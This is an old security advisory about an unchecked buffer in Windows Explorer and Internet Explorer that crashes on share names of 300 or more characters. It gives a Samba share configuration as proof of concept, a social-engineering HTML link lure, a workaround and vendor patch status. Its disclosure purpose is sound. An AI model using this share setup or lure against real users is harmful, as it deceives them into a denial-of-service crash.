|
Brought to you by:
Suppliers of:
|
|
|
| |
| MS Explorer (explorer.exe) and MS Internet Explorer(IEXPLORE.EXE) are core pieces of Microsoft Windows Operating Systems. An unchecked buffer allows a malicious user to crash Microsoft Explorer by creating a long shared directory name, and convincing the user to access it. |
| |
Credit:
The information has been provided by Rodrigo Gutierrez.
|
| |
Vulnerable Systems:
MS Internet Explorer, MS Explorer (explorer.exe) on Platforms:
* Windows XP(All), Windows 2000(All), Windows 98(All), Windows ME(All)
* Windows 2003 not tested
In order to exploit this, an attacker must be able to get a user to connect to a malicious server that contains a share name equal or longer than 300 characters.
Proof of Concept:
Windows will not allow you to create such a long share, but of course samba includes the feature. After your samba box is up and running create a share in your smb.conf:
[A x 300]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung
After your server is up, just get to your windows test box and get to the start menu > run > \\your.malicious.server.ip.
Plufff, explorer will crash.
Or By Social Engineering:
<a href="\\my.malicious.server.ip">Enter My 0day sploit archive l/p:n0ph33r</a>
Workaround:
From your network card settings disable the Client for Microsoft networks until an official fix for this vulnerability is available.
Vendor Status:
Rodrigo Gutierrez notified the vendor in the beginning of 2002, this vulnerability was supposed to be fixed in Windows XP service pack 1 in XP and Windows 2000 SP4 according to the vendors knowledge base article 322857.
|
|
|
|
|
